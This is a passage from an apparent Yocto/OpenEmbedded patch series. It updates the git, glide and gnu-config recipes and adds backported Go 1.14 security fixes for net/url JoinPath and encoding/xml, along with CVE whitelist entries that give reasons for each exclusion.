46# specific to Git for Windows
47CVE_CHECK_WHITELIST += "CVE-2023-22743"
48
18PACKAGECONFIG ??= "" 49PACKAGECONFIG ??= ""
19PACKAGECONFIG[cvsserver] = "" 50PACKAGECONFIG[cvsserver] = ""
20PACKAGECONFIG[svn] = "" 51PACKAGECONFIG[svn] = ""
diff --git a/meta/recipes-devtools/git/git/fixsort.patch b/meta/recipes-devtools/git/git/fixsort.patch
new file mode 100644
index 0000000000..eec1f84945
--- /dev/null
+++ b/meta/recipes-devtools/git/git/fixsort.patch
@@ -0,0 +1,36 @@
1[PATCH] generate-cmdlist.sh: Fix determinism issue
2
3Currently git binaries are not entirely reproducible, at least partly
4due to config-list.h differing in order depending on the system's
5locale settings. Under different locales, the entries:
6
7"sendemail.identity",
8"sendemail.<identity>.*",
9
10would differ in order for example and this leads to differences in
11the debug symbols for the binaries.
12
13This can be fixed by specifying the C locale for the sort in the
14shell script generating the header.
15
16Note: This is a backport of Richard Purdie's original patch for a more
17recent version of git. The offending code in this older version is
18in generate-cmdlist.sh. The upstream current version has this code
19in generate-configlist.sh.
20
21Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
22Signed-off-by: Steve Sakoman <steve@sakoman.com>
23Upstream-Status: Submitted [https://public-inbox.org/git/f029a942dd3d50d85e60bd37d8e454524987842f.camel@linuxfoundation.org/T/#u]
24
25index 71158f7..c137091 100755
26--- a/generate-cmdlist.sh
27+++ b/generate-cmdlist.sh
28@@ -82,7 +82,7 @@ static const char *config_name_list[] = {
29 EOF
30 grep -h '^[a-zA-Z].*\..*::$' Documentation/*config.txt Documentation/config/*.txt |
31 sed '/deprecated/d; s/::$//; s/, */\n/g' |
32- sort |
33+ LC_ALL=C sort |
34 while read line
35 do
36 echo " \"$line\","
diff --git a/meta/recipes-devtools/git/git_2.24.3.bb b/meta/recipes-devtools/git/git_2.24.4.bb
index ddd875f07b..f38c25f0ef 100644
--- a/meta/recipes-devtools/git/git_2.24.3.bb
+++ b/meta/recipes-devtools/git/git_2.24.4.bb
@@ -5,5 +5,5 @@ EXTRA_OECONF += "ac_cv_snprintf_returns_bogus=no \
5 " 5 "
6EXTRA_OEMAKE += "NO_GETTEXT=1" 6EXTRA_OEMAKE += "NO_GETTEXT=1"
7 7
8SRC_URI[tarball.sha256sum] = "ef6d1d1de1d7921a54d23d07479bd2766f050d6435cea5d3b5322aa4897cb3d7" 8SRC_URI[tarball.sha256sum] = "6e119e70d3762f28e1dc9928c526eb4d7519fd3870f862775cd10186653eb85a"
9SRC_URI[manpages.sha256sum] = "325795ba33c0be02370de79636f32ad3b447665c1f2b5b4de65181fa804bed31" 9SRC_URI[manpages.sha256sum] = "e687bcc91a6fd9cb74243f91a9c2d77c50ce202a09b35931021ecc521a373ed5"
diff --git a/meta/recipes-devtools/glide/glide_0.13.3.bb b/meta/recipes-devtools/glide/glide_0.13.3.bb
index 31295edf90..21773d91f9 100644
--- a/meta/recipes-devtools/glide/glide_0.13.3.bb
+++ b/meta/recipes-devtools/glide/glide_0.13.3.bb
@@ -1,10 +1,11 @@
1SUMMARY = "Vendor Package Management for Golang" 1SUMMARY = "Vendor Package Management for Golang"
2HOMEPAGE = "https://glide.sh" 2HOMEPAGE = "https://github.com/Masterminds/glide"
3DESCRIPTION = "Glide is a Vendor Package Management for Golang"
3LICENSE = "MIT" 4LICENSE = "MIT"
4LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=54905cf894f8cc416a92f4fc350c35b2" 5LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=54905cf894f8cc416a92f4fc350c35b2"
5 6
6GO_IMPORT = "github.com/Masterminds/glide" 7GO_IMPORT = "github.com/Masterminds/glide"
7SRC_URI = "git://${GO_IMPORT}" 8SRC_URI = "git://${GO_IMPORT};branch=master"
8SRCREV = "8ed5b9292379d86c39592a7e6a58eb9c903877cf" 9SRCREV = "8ed5b9292379d86c39592a7e6a58eb9c903877cf"
9 10
10inherit go 11inherit go
diff --git a/meta/recipes-devtools/gnu-config/gnu-config_git.bb b/meta/recipes-devtools/gnu-config/gnu-config_git.bb
index 48b7e6d4a6..05cd6a1e63 100644
--- a/meta/recipes-devtools/gnu-config/gnu-config_git.bb
+++ b/meta/recipes-devtools/gnu-config/gnu-config_git.bb
@@ -1,5 +1,6 @@
1SUMMARY = "gnu-configize" 1SUMMARY = "gnu-configize"
2DESCRIPTION = "Tool that installs the GNU config.guess / config.sub into a directory tree" 2DESCRIPTION = "Tool that installs the GNU config.guess / config.sub into a directory tree"
3HOMEPAGE = "https://git.savannah.gnu.org/cgit/config.git"
3SECTION = "devel" 4SECTION = "devel"
4LICENSE = "GPL-3.0-with-autoconf-exception" 5LICENSE = "GPL-3.0-with-autoconf-exception"
5LIC_FILES_CHKSUM = "file://config.guess;beginline=7;endline=27;md5=b75d42f59f706ea56d6a8e00216fca6a" 6LIC_FILES_CHKSUM = "file://config.guess;beginline=7;endline=27;md5=b75d42f59f706ea56d6a8e00216fca6a"
@@ -11,7 +12,7 @@ INHIBIT_DEFAULT_DEPS = "1"
11SRCREV = "5256817ace8493502ec88501a19e4051c2e220b0" 12SRCREV = "5256817ace8493502ec88501a19e4051c2e220b0"
12PV = "20200117+git${SRCPV}" 13PV = "20200117+git${SRCPV}"
13 14
14SRC_URI = "git://git.savannah.gnu.org/config.git \ 15SRC_URI = "git://git.savannah.gnu.org/git/config.git;protocol=https;branch=master \
15 file://gnu-configize.in" 16 file://gnu-configize.in"
16S = "${WORKDIR}/git" 17S = "${WORKDIR}/git"
17UPSTREAM_CHECK_COMMITS = "1" 18UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-devtools/go/go-1.14.inc b/meta/recipes-devtools/go/go-1.14.inc
index 3dfd671d11..9c7ceda891 100644
--- a/meta/recipes-devtools/go/go-1.14.inc
+++ b/meta/recipes-devtools/go/go-1.14.inc
@@ -16,6 +16,112 @@ SRC_URI += "\
16 file://0006-cmd-dist-separate-host-and-target-builds.patch \ 16 file://0006-cmd-dist-separate-host-and-target-builds.patch \
17 file://0007-cmd-go-make-GOROOT-precious-by-default.patch \ 17 file://0007-cmd-go-make-GOROOT-precious-by-default.patch \
18 file://0008-use-GOBUILDMODE-to-set-buildmode.patch \ 18 file://0008-use-GOBUILDMODE-to-set-buildmode.patch \
19 file://CVE-2021-34558.patch \
20 file://CVE-2021-33196.patch \
21 file://CVE-2021-33197.patch \
22 file://CVE-2021-38297.patch \
23 file://CVE-2022-23806.patch \
24 file://CVE-2022-23772.patch \
25 file://CVE-2021-44717.patch \
26 file://CVE-2022-24675.patch \
27 file://CVE-2021-31525.patch \
28 file://CVE-2022-30629.patch \
29 file://CVE-2022-30631.patch \
30 file://CVE-2022-30632.patch \
31 file://CVE-2022-30633.patch \
32 file://CVE-2022-30635.patch \
33 file://CVE-2022-32148.patch \
34 file://CVE-2022-32189.patch \
35 file://CVE-2021-27918.patch \
36 file://CVE-2021-36221.patch \
37 file://CVE-2021-39293.patch \
38 file://CVE-2021-41771.patch \
39 file://CVE-2022-27664.patch \
40 file://0001-CVE-2022-32190.patch \
41 file://0002-CVE-2022-32190.patch \
42 file://0003-CVE-2022-32190.patch \
43 file://0004-CVE-2022-32190.patch \
44 file://CVE-2022-2880.patch \
45 file://CVE-2022-2879.patch \
46 file://CVE-2021-33195.patch \
47 file://CVE-2021-33198.patch \
48 file://CVE-2021-44716.patch \
49 file://CVE-2022-24921.patch \
50 file://CVE-2022-28131.patch \
51 file://CVE-2022-28327.patch \
52 file://CVE-2022-41715.patch \
53 file://CVE-2022-41717.patch \
54 file://CVE-2022-1962.patch \
55 file://CVE-2022-41723.patch \
56 file://CVE-2022-41722-1.patch \
57 file://CVE-2022-41722-2.patch \
58 file://CVE-2020-29510.patch \
59 file://CVE-2023-24537.patch \
60 file://CVE-2023-24534.patch \
61 file://CVE-2023-24538-1.patch \
62 file://CVE-2023-24538-2.patch \
63 file://CVE-2023-24538_3.patch \
64 file://CVE-2023-24538_4.patch \
65 file://CVE-2023-24538_5.patch \
66 file://CVE-2023-24538_6.patch \
67 file://CVE-2023-24539.patch \
68 file://CVE-2023-24540.patch \
69 file://CVE-2023-29405-1.patch \
70 file://CVE-2023-29405-2.patch \
71 file://CVE-2023-29402.patch \
72 file://CVE-2023-29404.patch \
73 file://CVE-2023-29400.patch \
74 file://CVE-2023-29406-1.patch \
75 file://CVE-2023-29406-2.patch \
76 file://CVE-2023-29409.patch \
77 file://CVE-2022-41725-pre1.patch \
78 file://CVE-2022-41725-pre2.patch \
79 file://CVE-2022-41725-pre3.patch \
80 file://CVE-2022-41725.patch \
81 file://CVE-2023-24536_1.patch \
82 file://CVE-2023-24536_2.patch \
83 file://CVE-2023-24536_3.patch \
84 file://CVE-2023-39318.patch \
85 file://CVE-2023-39319.patch \
86 file://CVE-2023-39326.patch \
87 file://CVE-2023-45287-pre1.patch \
88 file://CVE-2023-45287-pre2.patch \
89 file://CVE-2023-45287-pre3.patch \
90 file://CVE-2023-45287.patch \
91 file://CVE-2023-45289.patch \
92 file://CVE-2023-45290.patch \
93 file://CVE-2024-24785.patch \
94 file://CVE-2024-24784.patch \
19" 95"
96
20SRC_URI_append_libc-musl = " file://0009-ld-replace-glibc-dynamic-linker-with-musl.patch" 97SRC_URI_append_libc-musl = " file://0009-ld-replace-glibc-dynamic-linker-with-musl.patch"
21SRC_URI[main.sha256sum] = "7ed13b2209e54a451835997f78035530b331c5b6943cdcd68a3d815fdc009149" 98SRC_URI[main.sha256sum] = "7ed13b2209e54a451835997f78035530b331c5b6943cdcd68a3d815fdc009149"
99
100# Upstream don't believe it is a signifiant real world issue and will only
101# fix in 1.17 onwards where we can drop this.
102# https://github.com/golang/go/issues/30999#issuecomment-910470358
103CVE_CHECK_WHITELIST += "CVE-2021-29923"
104
105# this issue affected go1.15 onwards
106# https://security-tracker.debian.org/tracker/CVE-2022-29526
107CVE_CHECK_WHITELIST += "CVE-2022-29526"
108
109# Issue only on windows
110CVE_CHECK_WHITELIST += "CVE-2022-29804"
111CVE_CHECK_WHITELIST += "CVE-2022-30580"
112CVE_CHECK_WHITELIST += "CVE-2022-30634"
113
114# Issue is in golang.org/x/net/html/parse.go, not used in go compiler
115CVE_CHECK_WHITELIST += "CVE-2021-33194"
116
117# Issue introduced in go1.16, does not exist in 1.14
118CVE_CHECK_WHITELIST += "CVE-2021-41772"
119
120# Fixes code that was added in go1.16, does not exist in 1.14
121CVE_CHECK_WHITELIST += "CVE-2022-30630"
122
123# This is specific to Microsoft Windows
124CVE_CHECK_WHITELIST += "CVE-2022-41716"
125
126# Issue introduced in go1.15beta1, does not exist in 1.14
127CVE_CHECK_WHITELIST += "CVE-2022-1705"
diff --git a/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch
new file mode 100644
index 0000000000..ad263b8023
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch
@@ -0,0 +1,74 @@
1From 755f2dc35a19e6806de3ecbf836fa06ad875c67a Mon Sep 17 00:00:00 2001
2From: Carl Johnson <me@carlmjohnson.net>
3Date: Fri, 4 Mar 2022 14:49:52 +0000
4Subject: [PATCH 1/4] net/url: add JoinPath, URL.JoinPath
5
6Builds on CL 332209.
7
8Fixes #47005
9
10Change-Id: I82708dede05d79a196ca63f5a4e7cb5ac9a041ea
11GitHub-Last-Rev: 51b735066eef74f5e67c3e8899c58f44c0383c61
12GitHub-Pull-Request: golang/go#50383
13Reviewed-on: https://go-review.googlesource.com/c/go/+/374654
14Reviewed-by: Russ Cox <rsc@golang.org>
15Auto-Submit: Russ Cox <rsc@golang.org>
16Trust: Ian Lance Taylor <iant@golang.org>
17Reviewed-by: Damien Neil <dneil@google.com>
18Run-TryBot: Ian Lance Taylor <iant@golang.org>
19TryBot-Result: Gopher Robot <gobot@golang.org>
20
21Upstream-Status: Backport [https://github.com/golang/go/commit/604140d93111f89911e17cb147dcf6a02d2700d0]
22CVE: CVE-2022-32190
23Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
24---
25 src/net/url/url.go | 23 +++++++++++++++++++++++
26 1 file changed, 23 insertions(+)
27
28diff --git a/src/net/url/url.go b/src/net/url/url.go
29index 2880e82..dea8bfe 100644
30--- a/src/net/url/url.go
31+++ b/src/net/url/url.go
32@@ -13,6 +13,7 @@ package url
33 import (
34 "errors"
35 "fmt"
36+ "path"
37 "sort"
38 "strconv"
39 "strings"
40@@ -1104,6 +1105,17 @@ func (u *URL) UnmarshalBinary(text []byte) error {
41 return nil
42 }
43
44+// JoinPath returns a new URL with the provided path elements joined to
45+// any existing path and the resulting path cleaned of any ./ or ../ elements.
46+func (u *URL) JoinPath(elem ...string) *URL {
47+ url := *u
48+ if len(elem) > 0 {
49+ elem = append([]string{u.Path}, elem...)
50+ url.setPath(path.Join(elem...))
51+ }
52+ return &url
53+}
54+
55 // validUserinfo reports whether s is a valid userinfo string per RFC 3986
56 // Section 3.2.1:
57 // userinfo = *( unreserved / pct-encoded / sub-delims / ":" )
58@@ -1144,3 +1156,14 @@ func stringContainsCTLByte(s string) bool {
59 }
60 return false
61 }
62+
63+// JoinPath returns a URL string with the provided path elements joined to
64+// the existing path of base and the resulting path cleaned of any ./ or ../ elements.
65+func JoinPath(base string, elem ...string) (result string, err error) {
66+ url, err := Parse(base)
67+ if err != nil {
68+ return
69+ }
70+ result = url.JoinPath(elem...).String()
71+ return
72+}
73--
742.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch
new file mode 100644
index 0000000000..1a11cc72bc
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch
@@ -0,0 +1,48 @@
1From 985108de87e7d2ecb2b28cb53b323d530387b884 Mon Sep 17 00:00:00 2001
2From: Ian Lance Taylor <iant@golang.org>
3Date: Thu, 31 Mar 2022 13:21:39 -0700
4Subject: [PATCH 2/4] net/url: preserve a trailing slash in JoinPath
5
6Fixes #52074
7
8Change-Id: I30897f32e70a6ca0c4e11aaf07088c27336efaba
9Reviewed-on: https://go-review.googlesource.com/c/go/+/397256
10Trust: Ian Lance Taylor <iant@golang.org>
11Run-TryBot: Ian Lance Taylor <iant@golang.org>
12TryBot-Result: Gopher Robot <gobot@golang.org>
13Reviewed-by: Matt Layher <mdlayher@gmail.com>
14Trust: Matt Layher <mdlayher@gmail.com>
15
16Upstream-Status: Backport [https://github.com/golang/go/commit/dbb52cc9f3e83a3040f46c2ae7650c15ab342179]
17CVE: CVE-2022-32190
18Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
19---
20 src/net/url/url.go | 9 ++++++++-
21 1 file changed, 8 insertions(+), 1 deletion(-)
22
23diff --git a/src/net/url/url.go b/src/net/url/url.go
24index dea8bfe..3436707 100644
25--- a/src/net/url/url.go
26+++ b/src/net/url/url.go
27@@ -1107,11 +1107,18 @@ func (u *URL) UnmarshalBinary(text []byte) error {
28
29 // JoinPath returns a new URL with the provided path elements joined to
30 // any existing path and the resulting path cleaned of any ./ or ../ elements.
31+// Any sequences of multiple / characters will be reduced to a single /.
32 func (u *URL) JoinPath(elem ...string) *URL {
33 url := *u
34 if len(elem) > 0 {
35 elem = append([]string{u.Path}, elem...)
36- url.setPath(path.Join(elem...))
37+ p := path.Join(elem...)
38+ // path.Join will remove any trailing slashes.
39+ // Preserve at least one.
40+ if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
41+ p += "/"
42+ }
43+ url.setPath(p)
44 }
45 return &url
46 }
47--
482.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch
new file mode 100644
index 0000000000..816d914983
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch
@@ -0,0 +1,36 @@
1From 2c632b883b0f11084cc247c8b50ad6c71fa7b447 Mon Sep 17 00:00:00 2001
2From: Sean Liao <sean@liao.dev>
3Date: Sat, 9 Jul 2022 18:38:45 +0100
4Subject: [PATCH 3/4] net/url: use EscapedPath for url.JoinPath
5
6Fixes #53763
7
8Change-Id: I08b53f159ebdce7907e8cc17316fd0c982363239
9Reviewed-on: https://go-review.googlesource.com/c/go/+/416774
10TryBot-Result: Gopher Robot <gobot@golang.org>
11Reviewed-by: Damien Neil <dneil@google.com>
12Reviewed-by: Bryan Mills <bcmills@google.com>
13Run-TryBot: Ian Lance Taylor <iant@golang.org>
14
15Upstream-Status: Backport [https://github.com/golang/go/commit/bf5898ef53d1693aa572da0da746c05e9a6f15c5]
16CVE: CVE-2022-32190
17Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
18---
19 src/net/url/url.go | 2 +-
20 1 file changed, 1 insertion(+), 1 deletion(-)
21
22diff --git a/src/net/url/url.go b/src/net/url/url.go
23index 3436707..73079a5 100644
24--- a/src/net/url/url.go
25+++ b/src/net/url/url.go
26@@ -1111,7 +1111,7 @@ func (u *URL) UnmarshalBinary(text []byte) error {
27 func (u *URL) JoinPath(elem ...string) *URL {
28 url := *u
29 if len(elem) > 0 {
30- elem = append([]string{u.Path}, elem...)
31+ elem = append([]string{u.EscapedPath()}, elem...)
32 p := path.Join(elem...)
33 // path.Join will remove any trailing slashes.
34 // Preserve at least one.
35--
362.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch
new file mode 100644
index 0000000000..4bdff3aed4
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch
@@ -0,0 +1,82 @@
1From f61e428699cbb52bab31fe2c124f49d085a209fe Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Fri, 12 Aug 2022 16:21:09 -0700
4Subject: [PATCH 4/4] net/url: consistently remove ../ elements in JoinPath
5
6JoinPath would fail to remove relative elements from the start of
7the path when the first path element is "".
8
9In addition, JoinPath would return the original path unmodified
10when provided with no elements to join, violating the documented
11behavior of always cleaning the resulting path.
12
13Correct both these cases.
14
15 JoinPath("http://go.dev", "../go")
16 // before: http://go.dev/../go
17 // after: http://go.dev/go
18
19 JoinPath("http://go.dev/../go")
20 // before: http://go.dev/../go
21 // after: http://go.dev/go
22
23For #54385.
24Fixes #54635.
25Fixes CVE-2022-32190.
26
27Change-Id: I6d22cd160d097c50703dd96e4f453c6c118fd5d9
28Reviewed-on: https://go-review.googlesource.com/c/go/+/423514
29Reviewed-by: David Chase <drchase@google.com>
30Reviewed-by: Alan Donovan <adonovan@google.com>
31(cherry picked from commit 0765da5884adcc8b744979303a36a27092d8fc51)
32Reviewed-on: https://go-review.googlesource.com/c/go/+/425357
33Run-TryBot: Damien Neil <dneil@google.com>
34TryBot-Result: Gopher Robot <gobot@golang.org>
35
36Upstream-Status: Backport [https://github.com/golang/go/commit/28335508913a46e05ef0c04a18e8a1a6beb775ec]
37CVE: CVE-2022-32190
38Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
39---
40 src/net/url/url.go | 26 ++++++++++++++++----------
41 1 file changed, 16 insertions(+), 10 deletions(-)
42
43diff --git a/src/net/url/url.go b/src/net/url/url.go
44index 73079a5..1e8baf9 100644
45--- a/src/net/url/url.go
46+++ b/src/net/url/url.go
47@@ -1109,17 +1109,23 @@ func (u *URL) UnmarshalBinary(text []byte) error {
48 // any existing path and the resulting path cleaned of any ./ or ../ elements.
49 // Any sequences of multiple / characters will be reduced to a single /.
50 func (u *URL) JoinPath(elem ...string) *URL {
51- url := *u
52- if len(elem) > 0 {
53- elem = append([]string{u.EscapedPath()}, elem...)
54- p := path.Join(elem...)
55- // path.Join will remove any trailing slashes.
56- // Preserve at least one.
57- if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
58- p += "/"
59- }
60- url.setPath(p)
61+ elem = append([]string{u.EscapedPath()}, elem...)
62+ var p string
63+ if !strings.HasPrefix(elem[0], "/") {
64+ // Return a relative path if u is relative,
65+ // but ensure that it contains no ../ elements.
66+ elem[0] = "/" + elem[0]
67+ p = path.Join(elem...)[1:]
68+ } else {
69+ p = path.Join(elem...)
70 }
71+ // path.Join will remove any trailing slashes.
72+ // Preserve at least one.
73+ if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
74+ p += "/"
75+ }
76+ url := *u
77+ url.setPath(p)
78 return &url
79 }
80
81--
822.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch b/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch
new file mode 100644
index 0000000000..e1c9e0bdb9
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch
@@ -0,0 +1,65 @@
1From a0bf4d38dc2057d28396594264bbdd43d412de22 Mon Sep 17 00:00:00 2001
2From: Filippo Valsorda <filippo@golang.org>
3Date: Tue, 27 Oct 2020 00:21:30 +0100
4Subject: [PATCH] encoding/xml: replace comments inside directives with a space
5
6A Directive (like <!ENTITY xxx []>) can't have other nodes nested inside
7it (in our data structure representation), so there is no way to
8preserve comments. The previous behavior was to just elide them, which
9however might change the semantic meaning of the surrounding markup.
10Instead, replace them with a space which hopefully has the same semantic
11effect of the comment.
12
13Directives are not actually a node type in the XML spec, which instead
14specifies each of them separately (<!ENTITY, <!DOCTYPE, etc.), each with
15its own grammar. The rules for where and when the comments are allowed
16are not straightforward, and can't be implemented without implementing
17custom logic for each of the directives.
18
19Simply preserving the comments in the body of the directive would be
20problematic, as there can be unmatched quotes inside the comment.
21Whether those quotes are considered meaningful semantically or not,
22other parsers might disagree and interpret the output differently.
23
24This issue was reported by Juho Nurminen of Mattermost as it leads to
25round-trip mismatches. See #43168. It's not being fixed in a security
26release because round-trip stability is not a currently supported
27security property of encoding/xml, and we don't believe these fixes
28would be sufficient to reliably guarantee it in the future.
29
30Fixes CVE-2020-29510
31Updates #43168
32
33Change-Id: Icd86c75beff3e1e0689543efebdad10ed5178ce3
34Reviewed-on: https://go-review.googlesource.com/c/go/+/277893
35Run-TryBot: Filippo Valsorda <filippo@golang.org>
36TryBot-Result: Go Bot <gobot@golang.org>
37Trust: Filippo Valsorda <filippo@golang.org>
38Reviewed-by: Katie Hockman <katie@golang.org>
39
40Upstream-Status: Backport from https://github.com/golang/go/commit/a9cfd55e2b09735a25976d1b008a0a3c767494f8
41CVE: CVE-2020-29510
42Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
43---
44 src/encoding/xml/xml.go | 6 ++++++
45 1 file changed, 6 insertions(+)
46
47diff --git a/src/encoding/xml/xml.go b/src/encoding/xml/xml.go
48index 01a1460..98647b2 100644
49--- a/src/encoding/xml/xml.go
50+++ b/src/encoding/xml/xml.go
51@@ -768,6 +768,12 @@ func (d *Decoder) rawToken() (Token, error) {
52 }
53 b0, b1 = b1, b
54 }
55+
56+ // Replace the comment with a space in the returned Directive
57+ // body, so that markup parts that were separated by the comment
58+ // (like a "<" and a "!") don't get joined when re-encoding the
59+ // Directive, taking new semantic meaning.
60+ d.buf.WriteByte(' ')
61 }
62 }
63 return Directive(d.buf.Bytes()), nil
64--
652.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch
new file mode 100644
index 0000000000..faa3f7f641
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch
@@ -0,0 +1,191 @@
1From d0b79e3513a29628f3599dc8860666b6eed75372 Mon Sep 17 00:00:00 2001
2From: Katie Hockman <katie@golang.org>
3Date: Mon, 1 Mar 2021 09:54:00 -0500
4Subject: [PATCH] encoding/xml: prevent infinite loop while decoding
5
6This change properly handles a TokenReader which
7returns an EOF in the middle of an open XML
8element.
9
10Thanks to Sam Whited for reporting this.
11
12Fixes CVE-2021-27918
13Fixes #44913
14
15Change-Id: Id02a3f3def4a1b415fa2d9a8e3b373eb6cb0f433
16Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1004594
17Reviewed-by: Russ Cox <rsc@google.com>
18Reviewed-by: Roland Shoemaker <bracewell@google.com>
19Reviewed-by: Filippo Valsorda <valsorda@google.com>
20Reviewed-on: https://go-review.googlesource.com/c/go/+/300391
21Trust: Katie Hockman <katie@golang.org>
22Run-TryBot: Katie Hockman <katie@golang.org>
23TryBot-Result: Go Bot <gobot@golang.org>
24Reviewed-by: Alexander Rakoczy <alex@golang.org>
25Reviewed-by: Filippo Valsorda <filippo@golang.org>
26
27https://github.com/golang/go/commit/d0b79e3513a29628f3599dc8860666b6eed75372
28CVE: CVE-2021-27918
29Upstream-Status: Backport
30Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
31---
32 src/encoding/xml/xml.go | 19 ++++---
33 src/encoding/xml/xml_test.go | 104 +++++++++++++++++++++++++++--------
34 2 files changed, 92 insertions(+), 31 deletions(-)
35
36diff --git a/src/encoding/xml/xml.go b/src/encoding/xml/xml.go
37index adaf4daf198b9..6f9594d7ba7a3 100644
38--- a/src/encoding/xml/xml.go
39+++ b/src/encoding/xml/xml.go
40@@ -271,7 +271,7 @@ func NewTokenDecoder(t TokenReader) *Decoder {
41 // it will return an error.
42 //
43 // Token implements XML name spaces as described by
44-// https://www.w3.org/TR/REC-xml-names/. Each of the
45+// https://www.w3.org/TR/REC-xml-names/. Each of the
46 // Name structures contained in the Token has the Space
47 // set to the URL identifying its name space when known.
48 // If Token encounters an unrecognized name space prefix,
49@@ -285,16 +285,17 @@ func (d *Decoder) Token() (Token, error) {
50 if d.nextToken != nil {
51 t = d.nextToken
52 d.nextToken = nil
53- } else if t, err = d.rawToken(); err != nil {
54- switch {
55- case err == io.EOF && d.t != nil:
56- err = nil
57- case err == io.EOF && d.stk != nil && d.stk.kind != stkEOF:
58- err = d.syntaxError("unexpected EOF")
59+ } else {
60+ if t, err = d.rawToken(); t == nil && err != nil {
61+ if err == io.EOF && d.stk != nil && d.stk.kind != stkEOF {
62+ err = d.syntaxError("unexpected EOF")
63+ }
64+ return nil, err
65 }
66- return t, err
67+ // We still have a token to process, so clear any
68+ // errors (e.g. EOF) and proceed.
69+ err = nil
70 }
71-
72 if !d.Strict {
73 if t1, ok := d.autoClose(t); ok {
74 d.nextToken = t
75diff --git a/src/encoding/xml/xml_test.go b/src/encoding/xml/xml_test.go
76index efddca43e9102..5672ebb375f0d 100644
77--- a/src/encoding/xml/xml_test.go
78+++ b/src/encoding/xml/xml_test.go
79@@ -33,30 +33,90 @@ func (t *toks) Token() (Token, error) {
80
81 func TestDecodeEOF(t *testing.T) {
82 start := StartElement{Name: Name{Local: "test"}}
83- t.Run("EarlyEOF", func(t *testing.T) {
84- d := NewTokenDecoder(&toks{earlyEOF: true, t: []Token{
85- start,
86- start.End(),
87- }})
88- err := d.Decode(&struct {
89- XMLName Name `xml:"test"`
90- }{})
91- if err != nil {
92- t.Error(err)
93+ tests := []struct {
94+ name string
95+ tokens []Token
96+ ok bool
97+ }{
98+ {
99+ name: "OK",
100+ tokens: []Token{
101+ start,
102+ start.End(),
103+ },
104+ ok: true,
105+ },
106+ {
107+ name: "Malformed",
108+ tokens: []Token{
109+ start,
110+ StartElement{Name: Name{Local: "bad"}},
111+ start.End(),
112+ },
113+ ok: false,
114+ },
115+ }
116+ for _, tc := range tests {
117+ for _, eof := range []bool{true, false} {
118+ name := fmt.Sprintf("%s/earlyEOF=%v", tc.name, eof)
119+ t.Run(name, func(t *testing.T) {
120+ d := NewTokenDecoder(&toks{
121+ earlyEOF: eof,
122+ t: tc.tokens,
123+ })
124+ err := d.Decode(&struct {
125+ XMLName Name `xml:"test"`
126+ }{})
127+ if tc.ok && err != nil {
128+ t.Fatalf("d.Decode: expected nil error, got %v", err)
129+ }
130+ if _, ok := err.(*SyntaxError); !tc.ok && !ok {
131+ t.Errorf("d.Decode: expected syntax error, got %v", err)
132+ }
133+ })
134 }
135- })
136- t.Run("LateEOF", func(t *testing.T) {
137- d := NewTokenDecoder(&toks{t: []Token{
138- start,
139- start.End(),
140- }})
141- err := d.Decode(&struct {
142- XMLName Name `xml:"test"`
143- }{})
144- if err != nil {
145- t.Error(err)
146+ }
147+}
148+
149+type toksNil struct {
150+ returnEOF bool
151+ t []Token
152+}
153+
154+func (t *toksNil) Token() (Token, error) {
155+ if len(t.t) == 0 {
156+ if !t.returnEOF {
157+ // Return nil, nil before returning an EOF. It's legal, but
158+ // discouraged.
159+ t.returnEOF = true
160+ return nil, nil
161 }
162- })
163+ return nil, io.EOF
164+ }
165+ var tok Token
166+ tok, t.t = t.t[0], t.t[1:]
167+ return tok, nil
168+}
169+
170+func TestDecodeNilToken(t *testing.T) {
171+ for _, strict := range []bool{true, false} {
172+ name := fmt.Sprintf("Strict=%v", strict)
173+ t.Run(name, func(t *testing.T) {
174+ start := StartElement{Name: Name{Local: "test"}}
175+ bad := StartElement{Name: Name{Local: "bad"}}
176+ d := NewTokenDecoder(&toksNil{
177+ // Malformed
178+ t: []Token{start, bad, start.End()},
179+ })
180+ d.Strict = strict
181+ err := d.Decode(&struct {
182+ XMLName Name `xml:"test"`
183+ }{})
184+ if _, ok := err.(*SyntaxError); !ok {
185+ t.Errorf("d.Decode: expected syntax error, got %v", err)
186+ }
187+ })
188+ }
189 }
190
191 const testInput = `
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch
new file mode 100644
